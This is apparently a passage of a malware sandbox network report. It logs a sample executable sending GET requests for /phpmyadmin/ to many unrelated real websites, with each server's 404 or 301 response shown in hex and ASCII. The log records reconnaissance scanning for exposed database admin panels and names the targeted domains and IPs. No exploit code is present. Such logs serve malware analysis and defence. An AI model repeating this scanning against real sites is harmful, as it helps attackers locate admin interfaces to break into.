                                                                                                                                                                                                    2023-11-26 05:59:30 UTC8192INData Raw: 66 61 63 0d 0a 39 39 38 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 6f 63 69 61 6c 2d 69 63 6f 6e 2d 66 6c 69 63 6b 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 36 33 64 63 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 6f 63 69 61 6c 2d 69 63 6f 6e 2d 66 6f 75 72 73 71 75 61 72 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 64 35 62 65 33 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 6f 63 69 61 6c 2d 69 63 6f 6e 2d 66 72 65 65 2d 63 6f 64 65 2d 63 61 6d 70 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 6f 63 69 61 6c 2d 69 63 6f 6e 2d 66 72 65 65 63 6f 64 65 63 61 6d 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 36 34 30 30 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 6f 63 69 61 6c 2d 69 63 6f 6e 2d 67 69 74 68 75 62 7b 62 61 63
                                                                                                                                                                                                    Data Ascii: fac998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{bac
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC5901INData Raw: 74 65 6d 22 3e 0a 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 73 6f 63 69 61 6c 2d 69 63 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 73 6f 63 69 61 6c 2d 69 63 6f 6e 2d 69 6e 73 74 61 67 72 61 6d 20 65 6c 65 6d 65 6e 74 6f 72 2d 72 65 70 65 61 74 65 72 2d 69 74 65 6d 2d 36 31 33 35 66 62 33 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 63 72 65 65 6e 2d 6f 6e 6c 79 22 3e 49 6e 73 74 61 67 72 61 6d 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 3e 3c 2f 69 3e 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 3c 2f 73 70
                                                                                                                                                                                                    Data Ascii: tem"><a class="elementor-icon elementor-social-icon elementor-social-icon-instagram elementor-repeater-item-6135fb3" target="_blank"><span class="elementor-screen-only">Instagram</span><i class="fab fa-instagram"></i></a></sp
                                                                                                                                                                                                    2023-11-26 05:59:30 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    18192.168.2.450971116.202.203.1764436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: eco-landeck.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC480INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 37 20 41 75 67 20 32 30 30 35 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 17 Aug 2005 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate,
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC1746INData Raw: 36 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 64 65 2d 64 65 22 20 6c 61 6e 67 3d 22 64 65 2d 64 65 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 2d 46 65 68 6c 65 72 3a 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61
                                                                                                                                                                                                    Data Ascii: 6c6<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-de" lang="de-de" dir="ltr"><head><title>404-Fehler: 404</title><meta


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    19192.168.2.45148678.128.62.1384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: integraledu.hr
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC290INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 74 65 67 72 61 6c 65 64 75 2e 68 72 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheLocation: https://www.integraledu.hr/phpmyadmin/Cache-Control: max-age=600Expires: Sun, 26 Nov 2023 06:09:29 GMTContent-Length: 311Connection: closeContent-Type
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC311INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 74 65 67 72 61 6c 65 64 75 2e 68 72 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.integraledu.hr/phpmyadmin/">here</a>.</p><hr><address>Apache Ser


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    20192.168.2.451000185.230.63.1074436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC177OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: linkan-group.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC834INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 6c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 69 6e 6b 61 6e 2d 67 72 6f 75 70 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 78 2d 77 69 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 31 37 30 30 39 37 38 33 36 39 2e 33 35 38 31 30 33 32 38 36 39 31 32 38 31 35 31 34 39 0d 0a 41 67 65 3a 20 30 0d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:29 GMTContent-Length: 0Connection: closelocation: https://www.linkan-group.com/phpmyadminstrict-transport-security: max-age=3600x-wix-request-id: 1700978369.358103286912815149Age: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    21192.168.2.451774185.54.192.1254436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: talentius.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC443INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:29 GMTServer: Apache/2.4.52 (Ubuntu)Pragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://talentius.com/wp-json/>; rel="https:
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC7749INData Raw: 31 65 63 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 45 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                                                                                                                                    Data Ascii: 1ecc<!DOCTYPE html><html lang="es-ES" class="no-js"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https:
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC141INData Raw: 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 77 69 64 67 65 74 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: cript type='text/javascript' src='https://talentius.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC8192INData Raw: 31 66 66 38 0d 0a 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 6d 6f 75 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 75 69 2f 64 72 61 67 67 61 62 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 31 31 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72
                                                                                                                                                                                                    Data Ascii: 1ff8cript' src='https://talentius.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script><script type='text/javascript' src='https://talentius.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script><script type='text/javascript' sr
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC6INData Raw: 31 66 66 38 0d 0a
                                                                                                                                                                                                    Data Ascii: 1ff8
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC8184INData Raw: 2d 69 74 65 6d 2d 32 39 34 22 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 20 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 63 75 73 74 6f 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 32 39 34 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 73 63 72 6f 6c 6c 22 20 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 6f 72 6d 61 63 69 6f 6e 2e 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 22 3e 41 43 43 45 53 4f 20 55 53 55 41 52 49 4f 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 09 09 09 09 09 3c 64 69 76 3e 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 61 76 69 73 6f 2d 6c
                                                                                                                                                                                                    Data Ascii: -item-294" class="dropdown menu-item menu-item-type-custom menu-item-object-custom menu-item-294"><a class="page-scroll" target="_blank" href="http://formacion.talentius.com/">ACCESO USUARIO</a></li></ul><div><p><a href="http://talentius.com/aviso-l
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC997INData Raw: 33 64 39 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 69 7a 6f 6e 65 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 70 61 72 61 6c 6c 61 78 2d 31 2e 31 2e 33 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 62 69 7a 6f 6e 65 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 66 61 6e 63 79 62 6f 78 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74
                                                                                                                                                                                                    Data Ascii: 3d9<script type='text/javascript' src='https://talentius.com/wp-content/themes/bizone/assets/js/jquery.parallax-1.1.3.js'></script><script type='text/javascript' src='https://talentius.com/wp-content/themes/bizone/assets/js/jquery.fancybox.js'></script


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    22192.168.2.451781192.96.211.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC183OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: prettypollycleaning.ae
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC230INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 72 65 74 74 79 70 6f 6c 6c 79 63 6c 65 61 6e 69 6e 67 2e 61 65 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 35 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:29 GMTServer: ApacheLocation: https://www.prettypollycleaning.ae/phpmyadmin/Content-Length: 254Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC254INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 72 65 74 74 79 70 6f 6c 6c 79 63 6c 65 61 6e 69 6e 67 2e 61 65 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.prettypollycleaning.ae/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    23192.168.2.45175266.235.200.1474436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:29 UTC177OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: tradeavenida.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC663INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https:/
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC706INData Raw: 37 64 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 27 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20
